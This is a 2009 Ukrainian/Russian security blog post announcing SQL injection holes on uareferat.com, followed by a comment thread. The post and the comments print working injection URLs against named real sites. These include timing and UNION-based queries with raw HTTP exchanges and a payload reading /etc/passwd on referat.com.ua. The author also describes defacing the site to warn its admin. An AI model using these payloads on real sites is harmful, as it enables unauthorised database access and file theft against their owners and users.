Уразливості на uareferat.com
19:13 09.12.200914.02.2009
У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості на проекті http://uareferat.com. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
09.12.2009
SQL DB Structure Extraction:
http://uareferat.com/rus/details/13220/
http://uareferat.com/rus/referaty/’/
http://uareferat.com/rus/’/
http://uareferat.com/rus/referaty/1/-1/
http://uareferat.com/abton/
SQL Injection:
http://uareferat.com/rus/details/’+benchmark(10000,md5(now()))+’/
http://uareferat.com/rus/referaty/1′+version()-’1/
Вивело п’ятий розділ сайта, значить MySQL 5.x.
http://uareferat.com/rus/referaty/1?+benchmark(10000,md5(now()))-’1/
http://uareferat.com/rus/’+benchmark(10000,md5(now()))+’/
Дані уразливості вже виправлені.
Неділя, 18:12 15.02.2009
ты наверно хакер…))
GET /files.php?id=&refdll=-1+union+select+version()– HTTP/1.1
HOST: uareferat.com
HTTP/1.1 302 Found
Server: nginx/0.6.32
Date: Sun, 15 Feb 2009 16:06:24 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5fa5a89d39c1c12ede81ea27ddeedca6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: down.php?id=&fid=369056
Content-Length: 0
GET /down.php?id=&fid=369056 HTTP/1.1
HOST: uareferat.com
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sun, 15 Feb 2009 16:06:42 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0d1070002c4ba0267c795f2b505901d1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Disposition: attachment; filename=5.0.67-log
Content-Length: 0
вывод тут:
Content-Disposition: attachment; filename=5.0.67-log
кому лень с http-заголовками и неткатом работать - просто заходите по ссылке типа http://uareferat.com/files.php?id=&refdll=-1+union+select+version()–
и обратите внимание на имя скачиваемого файла.
тут mysql 5, поэтому легко можна написать парсер для дампа information_schema.columns чтобы узнать все колонки и таблицы в бд.
а тут вообще весело:
http://referat.com.ua/download.php?id=-1′%20UNION%20SELECT%201,’../../../../../../../../etc/passwd’/*
Курсы CyberBionic Systematics делают чудеса…
Понеділок, 19:01 16.02.2009
Alex
Естественно я хакер, раз при беглом взгляде на сайт нашёл 6 уязвимостей. Плюс после написания данного поста, когда я искал админку на данном сайте, я нашёл ещё одну седьмую уязвимость. И в этом движке явно хватает дыр, о чём свидетельствует и то, что с каждым взглядом на сайт я нахожу новые уязвимости, и найденная тобою SQL Injection.
Учитывая, что ты также нашёл одну дыру на этом сайте, ты явно тоже стремишься стать хакером
. Но тебе есть куда ещё работать, т.к. приведенный тобою код нерабочий (надеюсь ты его сам писал, а не скопировал у другого человека и ненароком добавил ошибку). Сама уязвимость рабочая, но код (SQL запрос) нерабочий - ты неверный символ комментария использовал 
. Данный символ комментария используется в других СУБД, а в MySQL применяются два других символа - в данном случае нужно вместо — использовать #, чтобы атака сработала.
Так что с такими ляпами курсам CyberBionic Systematics до чудес далеко
. Учи матчасть и тогда может станешь хакером. В данном случае, Алекс, почитай руководства по SQL SQL Injection в разных СУБД, о которых я писал в прошом году - в них поданы нюансы различных СУБД.
Кстати об упомянутых тобою курсах. Это такая у тебя скрытая реклама? Реклама в комментариях у меня на сайте не приветствуется, так что не стоит этим заниматься.
Я обратил внимание, что там MySQL 5. Так что добраться до имен таблиц и полей в них можно будет без проблем. И вытянуть из них данные. Это хорошо, что не третья версия MySQL, но даже на ней возможны различные атаки.
Понеділок, 19:16 16.02.2009
Не нужно было тебе приводить заголовки. Ты же не статью пишешь, и если уж хотел уточнить, то привёл бы лишь один заголовок Content-Disposition. Проще было упомянуть, что ответ из БД выводится в заголовке сервера (а также, как ты и сказал, в имени скачиваемого файла в браузере).
Этого мне вполе было бы достаточно, и любой читатель моего сайта кому интересно, сам бы с этим разобрался. А использовать ли nc, telnet или другой инструмент для работы с http-заголовками (например, плагин к браузеру) - это личное дело каждого хакера. Кому как удобно - главное, чтобы был доступ к заголовкам.
Касательно опубликованных тобою деталей уязвимостей, то ты немного контрастируешь с тем, что я привёл в посте только анонс найденных уязвимостей. Детали тебе стоило написать админам сайта (в данном случае обоих сайтов - uareferat.com и referat.com.ua), и лишь потом публиковать детали - чтобы дать людям время на исправление (так как это я обычно делаю). Не стоило с этим спешить, т.к. это несёт риски для обоих сайтов.
Замечу, что на данном сайте используется движок (который также используется на многих сайтах в Уанете). И соответственно эти уязвимости имеют место в данном движке. О чём я сегодня напишу отдельный пост.
Сама уязвимость хорошая (и атакующий код рабочий). Но доступ к /etc/passwd используется в большинстве случаев лишь как пример, и больших угроз данная утечка информации не несёт. А вот доступ к произвольным файлам на сервере - это серьёзная уязвимость
. В данном случае в passwd утекают логины в системе и некоторая другая информация (в том числе реальные имена пользователей системы).
Об уязвимости на referat.com.ua тебе также стоило сообщить его админам. Только что я бегло глянул на этот сайт и нашёл ещё 3 дыры, поэтому со временем я напишу об этом в новостях (где упомяну и о твоей дыре). И сообщу об уязвимостях админам сайта.
Середа, 11:21 18.02.2009
Насколько я понимаю, дырки уже позарывали. Оперативненько они…
>У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості на проекті http://uareferat.com. Про що найближчим часом сповіщу адміністрацію проекту.
Почти год прошел…
Середа, 18:47 18.02.2009
Только сейчас дошла очередь до этого сайта - как видно из новостей, сейчас публикую информацию о дырах найденных мною в марте 2008. Я публикую информацию в хронологическом порядке, и учитывая, что я пощу одну дыру в день (одна или несколько дыр на одном сайте), а за день я могу найти дыры на множестве сайтов, то и накапливается их много, что приводит к подобным задержкам.
Периодически я делаю исключения, и публикую не в хронологическом порядке, например, когда дыра связана с недавно опубликованной, или она просто актуальная, или же если ранее она была по некоторым причинам пропущена. А также в случае проведения проектов, таких как MOSEB, MoBiC или Дни багов. Подобные исключения позволяют более оперативнее публиковать найденные узявимости
.
Нет, не закрыли. Все упомянутые дыры (а также я нашёл ещё новые, о чём напишу в отдельном посте) до сих пор не исправлены. Админу данного сайта я отправил три дня назад письмо и дыры так и не были исправлены. Надеюсь, что после того как я сегодня взломал его сайт
и разместил на нём сообщение о наличии уязвимостей, он всё же займётся безопасностью сайта.
Т.к. дыры на сайте имеют место долгое время (с момента запуска сайта), а также в самом движке Abton. И все сайты на данном движке также уязвимы.
Вівторок, 03:40 24.02.2009
нууу по поводу твоих посетителей - спорный вопрос) я не думаю что твой сайт посещают ребята которые рубят дампы датингов/шопов/etc, не говорю уже про билинги, платёжки, etc…)) а я вообще сайт случаено нашел хотя искал инфу вообще не из этой оперы) да и вообще, я в реале в киеве незнаю ниодного человека который активно смог бы юзать скули в ms, mysql, oracle, postgre и при этом знал 2-3 языка… кругом одни ламеры) все кто чему то научился - все свалили в мск, либо на кардинг перешли)
не интересно писать все скули вподряд) показал бы ты скуль на egold/paypal - был бы респект, а того что ты выкладываешь и на античате хватает)
Четвер, 00:08 26.02.2009
Естественно сайт читают разные люди, с разным уровнем подготовки. Как пользователи, веб девелоперы и админы сайтов, так и хакеры. Периодически и хакеры читают мой сайт, пишут письма и комментарии, как ты к примеру
. О том, что хакеры (и всякие скрипт кидисы) читают в той или иной степени мой сайт я также знаю по ежедневным попыткам атак на сайт (ясное дело безуспешным).
Так что и профессионалы читают мой веб проект. А материалы я публикую для всех групп посетителей, поэтому каждый найдёт полезное для себя.
В любом случае я стараюсь давать людям возможность поработать своей головой. Поэтому и сказал тебе, что не нужно постить все заголовки. Чтобы люди могли сами разобраться с хедерами и с данной конкретной уязвимостью. Т.к. подобная дополнительная работа при чтении материалов на сайте пойдёт только на пользу.
Четвер, 00:34 26.02.2009
Я не свалил никуда. Хотя мне многократно предлагали свалить в те же США. Так что пока я жив, для Украины ещё не всё потеряно
.
Ну и не все украинские хакеры занимаюся криминалом (не верь всему, что пишут журналисты) - я к примеру им не занимаюсь
. А то, что в Украине, и в Киеве в частности, есть толковые люди (помимо меня), то я это знаю по своим друзьям. Хакерством из них никто не занимается, но зато активно работают в области программирования и/или веб девелопинга (чем я сам также занимаюсь, и только с начала 2005 я начал увлекаться темой веб безопасности).
Хотя давным давно, что меня, что моих друзей периодически заинтересовывали разные хакерские направления, типа взлом программ (даже пару лет назад “тряхнул стариной” и написал крак для одной программы, которым поделился со своим преподом в университете и КПИшниками). Та что не все ламеры, нужно просто знать места
(где есть и другие категории людей).
Я тоже лично не знаком (ни в Киеве, ни в Украине) с людьми, чтобы знали нюансы различных СУБД и умели проводить SQLi атаки. Сам же я хакал сайты использующие MSSQL, MySQL и Oracle (а также доводилось исследовать сайты на DB2, вот только сайты с Postgres SQL не попадались). И естественно изучаю особенности различных СУБД для самообразования. А также публикую информацию на сайте, чтобы другие также могли улучшать свои знания (чем ты мог бы заняться). В результате своих исследований в области БД я и создаю такие инструменты как SQL Injection ASCII Encoder.
Античат не читаю, так что не скажу чего на нём хватает (подобные ресурсы мне не интересны). А вот наличие SQLi на egold/paypal весьма маловероятно, зато вполне возможно наличие других дыр. То что на сайтах платёжных систем есть уязвимости, я уже писал на примере webmoney.ru.
Неділя, 03:33 28.06.2009
да ну нах)) это WP парсит два тире как одно)))
и не надо рассказывать какие комментарии в MySQL…)))
есть там как раз и такой тип) если документацию почитаешь узнаешь, что существует 3 типа комментариев:
/*comment*/
– comment (два тире)
#comment
после двух тире ставить пробел надо)
http://uareferat.com/files.php?id=&refdll=-1+union+select+version()–+1
возможно щас WP интерпретирует снова всё не так))
и мой тебе совет - меньше льсти себе, потому что на каждый … найдется больший))
попробуй снять дамп gala.net и описать взлом тут))) база юзеров в Sybase)
Adaptive Server Enterprise/11.9.2.6/1287/P/SWR 10032 ROLLUP/Linux Intel/Linux 2.2.5-15 i586/OPT/Mon Mar 11 23:46:34 2002
если получиться то поучи синтаксис mysql на примере work.ua (если ты кончено такой перец что найдешь там скуль
)
что мне не нравиться в whitehat’ах - так это то, что они фигню какую-то находят, а до конца взлом не доводят и хвалят себя как только могут))
я в websecurity пораньше чем ты) думаю тебе ещё стоит поизучать синтаксис Transact-SQL и PL/SQL =)
не обижайся, просто мне очень не понравилось что ты попробовал указать на мои ляпы которых нету))) я ж версию в заголовках не из неба взял? )))
Вівторок, 23:56 15.09.2009
Alex, WP то парсит, но ты, во-первых, должен был это учитывать при посте у меня на сайте (т.к. знал же какой у меня движок), а во вторых, что гораздо более важно, учитывать особенности данного третьего варианта комментариев в MySQL.
И если бы ты учёл эти особенности, то не использовал бы этот вариант, и тогда проблемы этой бы не возникло
.
Я хорошо знаю какие типы комментариев существуют в MySQL (3 типа), а также в других СУБД, и знаю их особенности. И тебе бы стоило учитывать эти особенности. Третий вариант отличен от используемых в других СУБД (за счёт пробела) и поддерживается не всеми версиями MySQL (поэтому я стараюсь его не использовать и порекомендовал тебе использовать два других). Я понимаю, что ты знаешь обо всех типах комментариев в MySQL, но ты явно не учитываешь их особенности, что видно из твоих примеров запросов.
Вот именно, что после двух тире (на самом деле дефисов) нужно пробел ставить. А в твоём первом примере этого нет, поэтому я обратил твоё внимание на это. Ясное дело, что ты запрос на сайт правильный сделал и он у тебя заработал, но пример опубликованный тобою у меня в комментариях уже не являлся рабочим.
Естественно, WP опять заменил два дефиса на один (на этот раз ты хоть завершающий пробел не забыл написать). Написал бы другой символ комментария - # или /* - и код бы был рабочим
. Если знаешь особенности WP, то зачем же тупить. Ты же хакер, прояви гибкость, чтобы опубликованные тобою примеры были рабочими.
Середа, 01:24 16.09.2009
Стараюсь себе не льстить, Alex, это тебе показалось
.
Взломом сайтов не занимаюсь. Делаю только добрые хаки. А снимание дампа gala.net к ним не относится
.
Кстати дыры на gala.net я находил, так что проблемы с безопасностью у них есть. Как и у work.com.ua (другой домена work.ua).
С синтаксисом MySQL хорошо знаком (хотя есть куда улучшать свои знания), т.к. работаю с даной СУБД с 2002 года. Можешь ознакомиться с моим MustLive/BPG MySQL Perl/CGI Client.
То, что whitehat’ы взломы обычно до конца не доводят - это характерно для них (знаю, т.к. сам whitehat). Обычно они только находят дыры и на этот ограничиваются (сообщают ли админам о дырах, или нет, это зависит от конкретного хакера). Взломами обычно же занимаются blackhat хакеры. А то, что они хвалят себя как только могут - то тут ты верно подметил, часто с таким сталкиваюсь.
Но whitehat’ы бывают разные, к примеру я регуляно практикую добрые хаки. В данном конкретном случае я похакал uareferat.com, чтобы сообщить админам в новостях у них на сайте о проблемах с безопасностью. Так что в отличии от тебя я похакал uareferat.com
. Из этого следует совет для тебя: меньше слов, а больше дела 
.
Всё может быть
. Я ни в коем случае не занижаю твой стаж в websecurity (просто помни, что эффективность годов стажа м.б. разная, можно заниматься эпизодически, а можно ежедневно). Я websecurity занимаюсь с марта 2005. Хотя впервые с этим столкнулся как веб разработчик ещё летом 2001 года, когда на мой сайт была совершена первая хакерская атака - мои весёлые друзья решили меня порадовать таким образом 
.
С данными синтаксисами не знаком, и особо не работал с СУБД поддерживающими их. Не доводилось сталкиваться с SQLi уязвимостями, где бы понадобилось знать синтаксис Transact-SQL или PL/SQL. Т.е. знания SQL у меня практические. А вот с Access и MySQL мне много раз доводилось работать как разработчику, поэтому их синтаксис SQL я знаю более детально (а для других СУБД я использую свои общие знания SQL и специфику конкретных СУБД).
Никаких обид
. А ляпы небольшие были, о чём я писал выше. А т.к. ты мне запостил этакую скрытую рекламу курсов, то я потому жестковато на это ответил, что мол есть куда улучшать эти курсы. На самом деле конфликтов тут никаких нет 
.
Середа, 09:56 16.09.2009
На счет лести… Но ты ж общаешься с богом! (http://websecurity.com.ua/642/) Что это как не лесть себе?!
ЗЫЖ: шутка
Четвер, 23:47 17.09.2009
Rett Pop, шутки шутками
, но касательно твоего комментария скажу следующее.
В коментариях к вышеупомянутому посту я общался с человеком с ником God. Почему он так себя назвал - это вопрос к нему (захотелось человеку себя так назвать, захотелось повыпендриваться). Не раз встречал людей которые использовали слово “god” как ник или часть ника. Тут ты верно подметил, это лесть себе
.
Этот персонаж запостил SEO-спам ко мне на сайт (что является обычной ситуацией). Но т.к. текст был тематическим, я его спам не удалил, а лишь убрал ссылку, чтобы SEO-состовляющей не было. Кто занимается SEO, тот может использовать мой SEO метод. В итоге, я нашёл на его сайте уязвимость и ему в емайле об этом написал, но на безопасность своего сайта от забил (т.е. его интерес к безопасности был показной). Так что я рекомендую не себе льстить, а дыры на своих сайтах исправлять.
Субота, 19:57 24.10.2009
“да и вообще, я в реале в киеве незнаю ниодного человека который активно смог бы юзать скули в ms, mysql, oracle, postgre и при этом знал 2-3 языка… кругом одни ламеры”
Бугаа а ты по хочу весь Киев знаешь? )))) пипец ржач, ты сам научись хоть грамотно писать, потом будешь тут блестать, да и вообще спецы не бегают и не орут об этом и тем более не общаются с “мега крутыми хакерами” как ты, так что расслабься звезда )))
Вообщем тут собственно и отвечать не стояло.
Четвер, 20:50 10.12.2009
Доречі цей інжект там уже давно, я його ще рік назад юзав
Четвер, 20:52 10.12.2009
Ше із сайтів з рефератами бачив інжект на ukrreferat.com , може навіть досі там є.
Субота, 23:53 12.12.2009
РУДИМЕНТ
Не стоит брать близко к сердцу комментарии Alex-а, особенно комментарии с ошибками
. Он конечно ещё та звезда, широко известная в киевском андерграунде, но тем не менее, в его постах есть тоже интересные вещи.
Так что не сорьтесь, ребята. Лучше потратье свою энергию на улучшение своего хакерского скила
.
Неділя, 01:09 13.12.2009
Dementor
Так, наведені мною SQLi на сайті були вже давно - я їх знайшов ще 31.03.2008. Але окрім них є ще інші інжекти на uareferat.com (в тому числі інжект Алекса, який до сих пір не виправлений). До того ж в розробників цього сайта є й інші сайти зі своїми дірками (в тому числі й SQLi)
.
Дірки на ukrreferat.com звісно є, як я щойно швидко глянув. А от серед сайтів від розробників uareferat.com дірок вистачає на referat.com.ua, в тому числі й SQL Injection.